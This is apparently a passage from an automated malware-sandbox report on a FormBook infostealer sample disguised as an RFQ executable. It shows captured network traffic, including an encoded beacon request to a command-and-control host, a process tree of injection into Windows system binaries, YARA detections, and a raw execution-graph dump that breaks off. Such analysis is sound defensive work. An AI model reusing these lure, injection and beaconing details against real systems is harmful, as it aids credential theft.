                  Content-Length: 5161
                  Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                  Vary: Accept-Encoding
                  ETag: "65a4939c-1429"
                  Cache-Control: no-cache
                  Accept-Ranges: bytes
                  Via: 1.1 google
                  Connection: close
                  Jul 4, 2024 03:13:53.623135090 CEST1236INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                  Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                  Jul 4, 2024 03:13:53.623188019 CEST1236INData Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                  Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                  Jul 4, 2024 03:13:53.623198032 CEST1236INData Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                  Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                  Jul 4, 2024 03:13:53.623207092 CEST1236INData Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                  Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                  Jul 4, 2024 03:13:53.623435974 CEST217INData Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                  Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.449780202.95.21.152803760C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:53.626059055 CEST504OUTGET /3in6/?b4=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&5DGDh=Hn3dOR HTTP/1.1
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Host: www.qmancha.com
                  Connection: close
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                  Jul 4, 2024 03:13:54.555488110 CEST193INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:54 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:21:09:54
                  Start date:03/07/2024
                  Path:C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe"
                  Imagebase:0xe70000
                  File size:1'173'504 bytes
                  MD5 hash:C8FE2E7043D030CF93CDAB759D44F5E4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:1
                  Start time:21:09:55
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe"
                  Imagebase:0x490000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:2
                  Start time:21:09:58
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe"
                  Imagebase:0x550000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:3
                  Start time:21:10:00
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\RMActivate_ssp.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\RMActivate_ssp.exe"
                  Imagebase:0xe20000
                  File size:478'720 bytes
                  MD5 hash:6599A09C160036131E4A933168DA245F
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:false

                  General

                  Target ID:5
                  Start time:21:10:13
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe"
                  Imagebase:0x550000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:8
                  Start time:21:10:24
                  Start date:03/07/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:0x7ff6bf500000
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:11
                  Start time:21:12:30
                  Start date:03/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\xl9lsbb.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\xl9lsbb.exe"
                  Imagebase:0x660000
                  File size:984'064 bytes
                  MD5 hash:C2F2B08E34FC25D172F2C3FCAB1ACFEB
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:13
                  Start time:21:12:32
                  Start date:03/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\xl9lsbb.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\xl9lsbb.exe"
                  Imagebase:0x890000
                  File size:984'064 bytes
                  MD5 hash:C2F2B08E34FC25D172F2C3FCAB1ACFEB
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:14
                  Start time:21:13:08
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe"
                  Imagebase:0x550000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:15
                  Start time:21:13:10
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\runonce.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\runonce.exe"
                  Imagebase:0xba0000
                  File size:47'104 bytes
                  MD5 hash:9E16655119DDE1B24A741C4FD4AD08FC
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:false

                  General

                  Target ID:16
                  Start time:21:13:23
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe"
                  Imagebase:0x550000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:17
                  Start time:21:13:35
                  Start date:03/07/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:0x7ff6bf500000
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:4.1%
                    Dynamic/Decrypted Code Coverage:1.3%
                    Signature Coverage:2.6%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:56
                    execution_graph 97226 e71066 97231 e7f8cf 97226->97231 97228 e7106c 97264 e92f80 97228->97264 97232 e7f8f0 97231->97232 97267 e90143 97232->97267 97236 e7f937 97277 e777c7 97236->97277 97239 e777c7 59 API calls 97240 e7f94b 97239->97240 97241 e777c7 59 API calls 97240->97241 97242 e7f955 97241->97242 97243 e777c7 59 API calls 97242->97243 97244 e7f993 97243->97244 97245 e777c7 59 API calls 97244->97245 97246 e7fa5e 97245->97246 97282 e860e7 97246->97282 97250 e7fa90 97251 e777c7 59 API calls 97250->97251 97252 e7fa9a 97251->97252 97310 e8ffde 97252->97310 97254 e7fae1 97255 e7faf1 GetStdHandle 97254->97255 97256 e7fb3d 97255->97256 97257 eb49d5 97255->97257 97258 e7fb45 OleInitialize 97256->97258 97257->97256 97259 eb49de 97257->97259 97258->97228 97317 ed6dda 64 API calls Mailbox 97259->97317 97261 eb49e5 97318 ed74a9 CreateThread 97261->97318 97263 eb49f1 CloseHandle 97263->97258 97390 e92e84 97264->97390 97266 e71076 97319 e9021c 97267->97319 97270 e9021c 59 API calls 97271 e90185 97270->97271 97272 e777c7 59 API calls 97271->97272 97273 e90191 97272->97273 97326 e77d2c 97273->97326 97275 e7f8f6 97276 e903a2 6 API calls 97275->97276 97276->97236 97278 e90ff6 Mailbox 59 API calls 97277->97278 97279 e777e8 97278->97279 97280 e90ff6 Mailbox 59 API calls 97279->97280 97281 e777f6 97280->97281 97281->97239 97283 e777c7 59 API calls 97282->97283 97284 e860f7 97283->97284 97285 e777c7 59 API calls 97284->97285 97286 e860ff 97285->97286 97385 e85bfd 97286->97385 97289 e85bfd 59 API calls 97290 e8610f 97289->97290 97291 e777c7 59 API calls 97290->97291 97292 e8611a 97291->97292 97293 e90ff6 Mailbox 59 API calls 97292->97293 97294 e7fa68 97293->97294 97295 e86259 97294->97295 97296 e86267 97295->97296 97297 e777c7 59 API calls 97296->97297 97298 e86272 97297->97298 97299 e777c7 59 API calls 97298->97299 97300 e8627d 97299->97300 97301 e777c7 59 API calls 97300->97301 97302 e86288 97301->97302 97303 e777c7 59 API calls 97302->97303 97304 e86293 97303->97304 97305 e85bfd 59 API calls 97304->97305 97306 e8629e 97305->97306 97307 e90ff6 Mailbox 59 API calls 97306->97307 97308 e862a5 RegisterWindowMessageW 97307->97308 97308->97250 97311 e8ffee 97310->97311 97312 ec5cc3 97310->97312 97313 e90ff6 Mailbox 59 API calls 97311->97313 97388 ed9d71 60 API calls 97312->97388 97315 e8fff6 97313->97315 97315->97254 97316 ec5cce 97317->97261 97318->97263 97389 ed748f 65 API calls 97318->97389 97320 e777c7 59 API calls 97319->97320 97321 e90227 97320->97321 97322 e777c7 59 API calls 97321->97322 97323 e9022f 97322->97323 97324 e777c7 59 API calls 97323->97324 97325 e9017b 97324->97325 97325->97270 97327 e77da5 97326->97327 97328 e77d38 __NMSG_WRITE 97326->97328 97339 e77e8c 97327->97339 97330 e77d73 97328->97330 97331 e77d4e 97328->97331 97336 e78189 97330->97336 97335 e78087 59 API calls Mailbox 97331->97335 97334 e77d56 _memmove 97334->97275 97335->97334 97343 e90ff6 97336->97343 97338 e78193 97338->97334 97340 e77e9a 97339->97340 97342 e77ea3 _memmove 97339->97342 97340->97342 97381 e77faf 97340->97381 97342->97334 97346 e90ffe 97343->97346 97345 e91018 97345->97338 97346->97345 97348 e9101c std::exception::exception 97346->97348 97353 e9594c 97346->97353 97370 e935e1 DecodePointer 97346->97370 97371 e987db RaiseException 97348->97371 97350 e91046 97372 e98711 58 API calls _free 97350->97372 97352 e91058 97352->97338 97354 e959c7 97353->97354 97361 e95958 97353->97361 97379 e935e1 DecodePointer 97354->97379 97356 e959cd 97380 e98d68 58 API calls __getptd_noexit 97356->97380 97359 e9598b RtlAllocateHeap 97359->97361 97369 e959bf 97359->97369 97361->97359 97362 e95963 97361->97362 97363 e959b3 97361->97363 97367 e959b1 97361->97367 97376 e935e1 DecodePointer 97361->97376 97362->97361 97373 e9a3ab 58 API calls __NMSG_WRITE 97362->97373 97374 e9a408 58 API calls 5 library calls 97362->97374 97375 e932df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97362->97375 97377 e98d68 58 API calls __getptd_noexit 97363->97377 97378 e98d68 58 API calls __getptd_noexit 97367->97378 97369->97346 97370->97346 97371->97350 97372->97352 97373->97362 97374->97362 97376->97361 97377->97367 97378->97369 97379->97356 97380->97369 97382 e77fc2 97381->97382 97384 e77fbf _memmove 97381->97384 97383 e90ff6 Mailbox 59 API calls 97382->97383 97383->97384 97384->97342 97386 e777c7 59 API calls 97385->97386 97387 e85c05 97386->97387 97387->97289 97388->97316 97391 e92e90 _fseek 97390->97391 97398 e93457 97391->97398 97397 e92eb7 _fseek 97397->97266 97415 e99e4b 97398->97415 97400 e92e99 97401 e92ec8 DecodePointer DecodePointer 97400->97401 97402 e92ef5 97401->97402 97403 e92ea5 97401->97403 97402->97403 97461 e989e4 59 API calls _fseek 97402->97461 97412 e92ec2 97403->97412 97405 e92f58 EncodePointer EncodePointer 97405->97403 97406 e92f2c 97406->97403 97410 e92f46 EncodePointer 97406->97410 97463 e98aa4 61 API calls 2 library calls 97406->97463 97407 e92f07 97407->97405 97407->97406 97462 e98aa4 61 API calls 2 library calls 97407->97462 97410->97405 97411 e92f40 97411->97403 97411->97410 97464 e93460 97412->97464 97416 e99e5c 97415->97416 97417 e99e6f EnterCriticalSection 97415->97417 97422 e99ed3 97416->97422 97417->97400 97419 e99e62 97419->97417 97446 e932f5 58 API calls 3 library calls 97419->97446 97423 e99edf _fseek 97422->97423 97424 e99ee8 97423->97424 97425 e99f00 97423->97425 97447 e9a3ab 58 API calls __NMSG_WRITE 97424->97447 97433 e99f21 _fseek 97425->97433 97450 e98a5d 58 API calls 2 library calls 97425->97450 97427 e99eed 97448 e9a408 58 API calls 5 library calls 97427->97448 97430 e99f15 97431 e99f2b 97430->97431 97432 e99f1c 97430->97432 97436 e99e4b __lock 58 API calls 97431->97436 97451 e98d68 58 API calls __getptd_noexit 97432->97451 97433->97419 97434 e99ef4 97449 e932df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97434->97449 97438 e99f32 97436->97438 97440 e99f3f 97438->97440 97441 e99f57 97438->97441 97452 e9a06b InitializeCriticalSectionAndSpinCount 97440->97452 97453 e92f95 97441->97453 97444 e99f4b 97459 e99f73 LeaveCriticalSection _doexit 97444->97459 97447->97427 97448->97434 97450->97430 97451->97433 97452->97444 97454 e92fc7 __dosmaperr 97453->97454 97455 e92f9e RtlFreeHeap 97453->97455 97454->97444 97455->97454 97456 e92fb3 97455->97456 97460 e98d68 58 API calls __getptd_noexit 97456->97460 97458 e92fb9 GetLastError 97458->97454 97459->97433 97460->97458 97461->97407 97462->97406 97463->97411 97467 e99fb5 LeaveCriticalSection 97464->97467 97466 e92ec7 97466->97397 97467->97466 97468 e7b56e 97475 e8fb84 97468->97475 97470 e7b584 97484 e7c707 97470->97484 97472 e7b5ac 97474 e7a4e8 97472->97474 97496 eda0b5 89 API calls 4 library calls 97472->97496 97476 e8fb90 97475->97476 97477 e8fba2 97475->97477 97497 e79e9c 60 API calls Mailbox 97476->97497 97479 e8fba8 97477->97479 97480 e8fbd1 97477->97480 97481 e90ff6 Mailbox 59 API calls 97479->97481 97498 e79e9c 60 API calls Mailbox 97480->97498 97483 e8fb9a 97481->97483 97483->97470 97486 e7c72c _wcscmp 97484->97486 97499 e77b76 97484->97499 97489 e7c760 Mailbox 97486->97489 97504 e77f41 97486->97504 97489->97472 97493 eb1ad7 97495 eb1adb Mailbox 97493->97495 97518 e79e9c 60 API calls Mailbox 97493->97518 97495->97472 97496->97474 97497->97483 97498->97483 97500 e90ff6 Mailbox 59 API calls 97499->97500 97501 e77b9b 97500->97501 97502 e78189 59 API calls 97501->97502 97503 e77baa 97502->97503 97503->97486 97505 e77f50 __NMSG_WRITE _memmove 97504->97505 97506 e90ff6 Mailbox 59 API calls 97505->97506 97507 e77f8e 97506->97507 97508 e77c8e 97507->97508 97509 e77ca0 97508->97509 97510 eaf094 97508->97510 97519 e77bb1 97509->97519 97525 ec8123 59 API calls _memmove 97510->97525 97513 e77cac 97517 e7859a 68 API calls 97513->97517 97514 eaf09e 97526 e781a7 97514->97526 97516 eaf0a6 Mailbox 97517->97493 97518->97495 97520 e77bbf 97519->97520 97521 e77be5 _memmove 97519->97521 97520->97521 97522 e90ff6 Mailbox 59 API calls 97520->97522 97521->97513 97523 e77c34 97522->97523 97524 e90ff6 Mailbox 59 API calls 97523->97524 97524->97521 97525->97514 97527 e781b2 97526->97527 97528 e781ba 97526->97528 97530 e780d7 59 API calls 2 library calls 97527->97530 97528->97516 97530->97528 97531 eaff06 97532 eaff10 97531->97532 97571 e7ac90 Mailbox _memmove 97531->97571 97843 e78e34 59 API calls Mailbox 97532->97843 97536 e90ff6 59 API calls Mailbox 97559 e7a097 Mailbox 97536->97559 97540 e7b5d5 97543 e781a7 59 API calls 97540->97543 97541 e7b5da 97853 eda0b5 89 API calls 4 library calls 97541->97853 97556 e7a1b7 97543->97556 97544 eb047f 97847 eda0b5 89 API calls 4 library calls 97544->97847 97546 e777c7 59 API calls 97546->97559 97547 e77f41 59 API calls 97547->97571 97549 e781a7 59 API calls 97549->97559 97550 eb048e 97551 ec7405 59 API calls 97551->97559 97552 e92f80 67 API calls __cinit 97552->97559 97554 ec66f4 Mailbox 59 API calls 97554->97556 97555 eb0e00 97852 eda0b5 89 API calls 4 library calls 97555->97852 97559->97536 97559->97540 97559->97541 97559->97544 97559->97546 97559->97549 97559->97551 97559->97552 97559->97555 97559->97556 97560 e7a6ba 97559->97560 97837 e7ca20 341 API calls 2 library calls 97559->97837 97838 e7ba60 60 API calls Mailbox 97559->97838 97851 eda0b5 89 API calls 4 library calls 97560->97851 97562 e7b416 97842 e7f803 341 API calls 97562->97842 97565 eb0c94 97849 e79df0 59 API calls Mailbox 97565->97849 97567 eb0ca2 97850 eda0b5 89 API calls 4 library calls 97567->97850 97569 eb0c86 97569->97554 97569->97556 97570 e7b37c 97840 e79e9c 60 API calls Mailbox 97570->97840 97571->97547 97571->97556 97571->97559 97571->97562 97571->97565 97571->97567 97571->97570 97573 e90ff6 59 API calls Mailbox 97571->97573 97577 e7b685 97571->97577 97580 e7ade2 Mailbox 97571->97580 97587 e7a000 97571->97587 97756 eec5f4 97571->97756 97788 ed7be0 97571->97788 97794 eebf80 97571->97794 97834 ec66f4 97571->97834 97844 ec7405 59 API calls 97571->97844 97845 eec4a7 85 API calls 2 library calls 97571->97845 97573->97571 97574 e7b38d 97841 e79e9c 60 API calls Mailbox 97574->97841 97848 eda0b5 89 API calls 4 library calls 97577->97848 97580->97556 97580->97569 97580->97577 97581 eb00e0 VariantClear 97580->97581 97610 edd2e5 97580->97610 97657 ee474d 97580->97657 97666 e82123 97580->97666 97706 eee237 97580->97706 97709 edd2e6 97580->97709 97839 e79df0 59 API calls Mailbox 97580->97839 97846 ec7405 59 API calls 97580->97846 97581->97580 97588 e7a01f 97587->97588 97604 e7a04d Mailbox 97587->97604 97589 e90ff6 Mailbox 59 API calls 97588->97589 97589->97604 97590 e92f80 67 API calls __cinit 97590->97604 97591 e7b5d5 97592 e781a7 59 API calls 97591->97592 97605 e7a1b7 97592->97605 97593 ec7405 59 API calls 97593->97604 97594 e90ff6 59 API calls Mailbox 97594->97604 97598 eb047f 97856 eda0b5 89 API calls 4 library calls 97598->97856 97599 